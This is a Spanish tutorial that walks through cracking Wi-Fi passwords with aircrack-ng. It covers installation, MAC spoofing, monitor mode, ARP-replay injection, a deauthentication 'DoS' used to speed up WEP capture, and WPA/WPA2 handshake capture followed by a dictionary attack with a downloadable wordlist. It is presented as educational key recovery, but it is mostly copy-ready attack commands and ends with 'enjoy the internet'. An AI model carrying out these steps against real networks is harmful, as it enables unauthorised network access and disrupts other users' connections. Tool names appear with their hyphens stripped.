Download - Crackeando con aircrack
TUTORIAL DE AIRCRACKNG
Paolo Norambuena
Estudiante Ingeniería (e)
en Computación e Informática
Universidad del Bío-Bío, Concepción.
Tutorial de Aircrackng by Paolo Norambuena is licensed under a Creative
Commons AtribuciónNo ComercialLicenciar Igual 2.0 Chile License.
Tutorial de Aircrackng by Paolo Norambuena is licensed under a Creative
Commons AtribuciónNo ComercialLicenciar Igual 2.0 Chile License.
AIRCRACKNGEsta es una guía con fines educativos para el uso y manipulación de Aircrackng
sobre las distintas distribuciones de Linux. Se explicará desde su instalación en
sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que
posteriormente no existan dudas sobre ninguna distribución.
En primer lugar debemos tener instalado en nuestro sistema el Driver del
Fabricante de nuestra tarjeta de red, aircrackng no funciona con drivers
emulados por ndiswrapper.
Instalando Aircrackng
En este apartado instalaremos aircrackng en las distintas distribuciones
comenzando por Ubuntu.
Ubuntu.
$ sudo aptget install aircrackng
Mandriva
# urpmi aircrackng
OpenSUSE
Descargar:
ftp://ftp.pbone.net/mirror/packman.iubremen.de/suse/11.0/SRPMS/aircrackng1.0rc3
0.pm.1.nosrc.rpm
Instalar haciendo Doble Click al paquete una vez descargado.
SlackWare
Descargar
http://repository.slacky.eu/slackware12.2/security/aircrackng/1.0rc3/aircrackng
1.0rc3i4861dd.tgz
Una vez descargado por consola (terminal – konsole, etc), ejecutar
# installpkg aircrackng1.0rc3i4861dd.tgz
Paquetes complementarios.
Una vez instalado aircrackng puede ser necesario la instalación de un paquete
adicional por lo cual descargaremos IW, que es un complemento para poner
nuestra tarjeta inalámbrica en modo monitor.
según la distribución será necesario actualizar la librería libnl
$ sudo aptget install libnl1* (ubuntu, debian)
# urpmi a libnl (mandriva)
Instalada y/o actualizada la librería procedemos a descargar iw.
# wget http://wireless.kernel.org/download/iw/iw0.9.13.tar.bz2
# tar jxvf iw0.9.13.tar.bz2
# cd iw0.9.13
# make
#make install
Y de esta forma ya tenemos aircrackng y su componente para poner en modo
monitor nuestra wireless.
Ahora solo nos queda empezar a trabajar.
Recuperando Claves.
Ahora empezamos nuestro trabajo, lo que se realizó anteriormente solo se hace
una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se
realiza siempre es lo que a continuación se detalla.
Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi
Mandriva :
# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# ifconfig (wlan0, eth1, etc) up
Debian / Ubuntu :
$ sudo ifconfig (wlan0, eth1, etc) down
$ sudo ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
$ sudo ifconfig (wlan0, eth1, etc) up
Slackware :
# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# /etc/rc.d/rc.inet1 (wlan0, eth1, etc) start
IMPORTANTE: Las direcciones mac SIEMPRE deben iniciar con 00
Para saber cual es nuestra MAC debemos ejecutar
#ifconfig (wlan0, eth1, etc) | grep Hwaddr
De la vista anterior podemos sacar nuestra dirección mac de HWaddr la serie
numerica que acompaña la instrucción antes destacada es nuestra dirección,
que utilizaremos desde ahora en adelante.
Airmonng.
Airmonng es parte de la suite de aircrackng la cual permite crear la
interfaz mon0 en modo monitor. Su utilización es la siguiente
# airmonng start (wlan0, eth1, etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos
anteriormente.
# iw dev wlan0 interface add mon0 type monitor
Y con esto ya tenemos el primer paso completo.
Airodumpng
# airodumpng mon0
De esta forma veremos todas las redes disponibles con sus respectivos canales,
una vez que ya encontramos nuestra red creamos un filtro con el canal de
trabajo, en este caso canal 6 (columna CH), paramos la ejecución de airodump
ng presionando Ctrl + C, y posteriormente ejecutamos:
c = Filtro de canal 6, 11, 1, etc.
w = Escribir resultados en un documento.
# airodumpng c 6 w nombre mon0
De esta forma hemos creado un filtro que solo trabajará en el canal indicado (6).
Nuestra red es Jimmy
AireplayNg
Una vez que airodumpng ya está trabajando, abrimos una nueva consola donde
empezaremos a trabajar con aireplayng.
Lo primero que debemos hacer con aireplayng es asociarnos a la red.
#aireplayng 1 6000 q 10 o 1 e (ESSID Router) a (Mac Router) h (nuestra mac)
mon0
Donde :
1 6000 = Autentificará cada 6000 segundos.
q 10 = Intervalo de tiempo en que enviará un paquete “Keep Alive”
o 1 = Cantidad de paquetes “keep allive” que enviará
Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac del
Router?. Bueno, si recordamos en la consola anterior ejecutamos airodumpng, de
esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac
y la ESSID o nombre del router respectivamente.
De esta forma estaremos asociados a la red la cual cada 10 segundos aireplayng
mandará un paquete llamado “KEEPALIVE”, lo que avisará al router que seguimos
asociados y asi no nos botará a cada rato.
Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva
consola ejecutaremos nuevamente aireplayng pero en modo agresivo.
#aireplayng 3 b (Mac del router) h (nuestra mac) mon0
De la imagen anterior lo que nos interesa es que aumenten los ARP, ya que son
esos los paquetes capturados y los que además nos entregarán la clave buscada.
Una vez que tenemos desde 150.000 paquetes capturados empezamos a trabajar
con aircrackng.
Nunca está demás recordar que mientras mas paquetes capturados, es mucho
mejor, ya que más pronto obtendremos la clave.
En caso de que este ataque no capture paquetes ARP o que en mucho tiempo
hayamos capturado pocos paquetes, podemos realizar un Ataque DoS
(Denegación de Servicios). Para realizar este ataque es necesario simplemente
saber la dirección Mac del Router, dato que por lo demás, hemos utilizado para
cada acción con aircrackng y sus componentes.
Ahora ¿Como realizamos el ataque DoS con aircrackng?
R: // #aireplayng 0 0 a (Mac Router) mon0
Con eso ya estaríamos acelerando la transferencia y captura de paquetes.
AircrackNg
Ya estamos en el paso final, con los paquetes de datos capturados
procedemos a ejecutar aircrackng, para lo cual tenemos dos formas, una lenta
pero efectiva, y una rápida pero se necesita una mayor cantidad de paquetes
para desencriptar la clave.
Forma lenta
#aircrackng *.cap
Forma Rápida (se necesita mayor cantidad de paquetes capturados)
#aircrackng z *.cap
De esta forma ya hemos desencriptado la clave que buscabamos, solo nos
queda hacer configurar la clave en el cliente de conexión para eso solo tienen
que borrar los dos puntos ( : ) que hay entre cada par de caracteres, ahora a
disfrutar de internet.
Recordatorio.
– Al finalizar este tutorial, cabe recordar que la distancia afecta nuestro trabajo,
si estamos muy lejos de la red a atacar la transferencia y captura de paquetes
será muy lenta llegando incluso a ser nula. Por lo cual es recomendable estar a
una distancia prudente para poder realizar la captura de forma rápida.
– Los drivers para las tarjetas inalambricas deben ser los propietarios, no se puede
realizar por emulación de drivers, en este caso con ndiswrapper, por ejemplo.
– Las acciones deben ser ejecutadas como Super Usuario (root) en los sistemas
que lo permitan, en caso de Ubuntu, se debe ejecutar con sudo.
– Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las
cambien en forma manual.
– Si no aireplayng no inyecta ni captura paquetes, realizamos un ataque DoS
con aireplay #aireplayng 0 0 a (Mac Router) mon0
– Todo lo que tenga # en Ubuntu se debe ejecutar con sudo.
Finalizando.
Espero que este tutorial sea de utilidad para cada persona que lo lea. Este tutorial
está enfocado en una forma de ataque, en aircrackng existen muchos otros
métodos, algunos más complicados que otros, pero la idea es aprender y adoptar
la forma más cómoda para cada uno.
Agradecimientos Aníbal “Chavo” Zapata, por la instrucción de ataque DoS.
Información recopilada de distintos sitios de internet, especialmente de
http://www.aircrackng.org/doku.php sitio oficial de Aircrackng.
En caso de duda, contactar a [email protected]
Tutorial de Aircrackng by Paolo Norambuena is licensed under a Creative
Commons AtribuciónNo ComercialLicenciar Igual 2.0 Chile License.
Parte 2 :
Recuperando
Claves
WPA/WPA2 Con
Aircrackng
Introducción.
De seguro muchos se han preguntado, ¿como poder recuperar la clave
wpa/wpa2 de mi router sin tener que resetearlo?, bueno al igual que antes, la
respuesta es con aircrackng.
En esta sección se demostrará como en unos pocos pasos se puede obtener la
clave en forma rápida, los ingredientes para recuperar estas claves son :
– Equipo con tarjeta inalambrica.
– Distro de Linux Instalada o Live CD.
– Suite AircrackNG instalada (se detallo en la primera parte).
– Diccionario de palabras.
– Saber la dirección MAC de nuestra tarjeta (se vio en la sección anterior)
airmonng
Comenzando con esta parte debemos poner nuestra tarjeta en modo monitor
# airmonng start (wlan0, eth1, etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos
anteriormente.
# iw dev wlan0 interface add mon0 type monitor
Y con esto ya tenemos el primer paso completo.
Airodumpng
#airodumpng c (numero de canal) w (nombre archivo) mon0
Así estamos escaneando las redes existentes en un solo canal, esta consola debe
seguir trabajando sin ser detenida.
De esta pantalla necesitaremos los siguientes datos con los cuales trabajaremos el
resto del tutorial.
Nombre del Router (ESSID) : wifiubb
Mac del Router (BSSID) : 00:1A:70:EE:5E:D6
Dirección MAC de un cliente : 00:16:44:A2:40:D4
Aireplayng
Ya tenemos los datos necesarios y airodumpng sigue en funcionamiento, por lo
cual ahora es el turno de aireplayng.
En una nueva consola ejecutamos :
# aireplayng 0 1 a 00:1A:70:EE:5E:D6 c 00:16:44:A2:40:D4 mon0
donde tenemos
0 : deautenticación
1 : es el número de deautenticaciones enviadas (puedes enviar infinitas si se
deseas. Para infinito es 0)
a : es la dirección MAC del punto de acceso o Router
c : es la dirección MAC del cliente que queremos deautenticar
De esta forma estamos capturando el handshake que necesitamos para desencriptar la clave.
Una vez que se ha captura el handshake ejecutamos aircrackng para su desencriptación.
Para aircrack las instrucciones son las siguientes
# aircrackng w diccionario b 00:1A:70:EE:5E:D6 *.cap
Y posteriormente, obtendremos nuestra clave con una salida como esta
Recomendaciones.
Para trabajar con claves tipo WPA/WPA2 es necesario poder contar con un buen diccionario de palabras, ya que el trabajo de aircrackng es ir comparando el handshake con cada una de las palabras del diccionario que tenemos.
Pueden descargar un diccionario de palabras desde aquí
http://wjota.uuuq.com/tutoriales/diccionario.zip
Que es el diccionario que se utilizó para el ejemplo, y puede ser modificado, agregando o quitando palabras.
Tutorial de Aircrackng by Paolo Norambuena is licensed under a Creative
Commons AtribuciónNo ComercialLicenciar Igual 2.0 Chile License.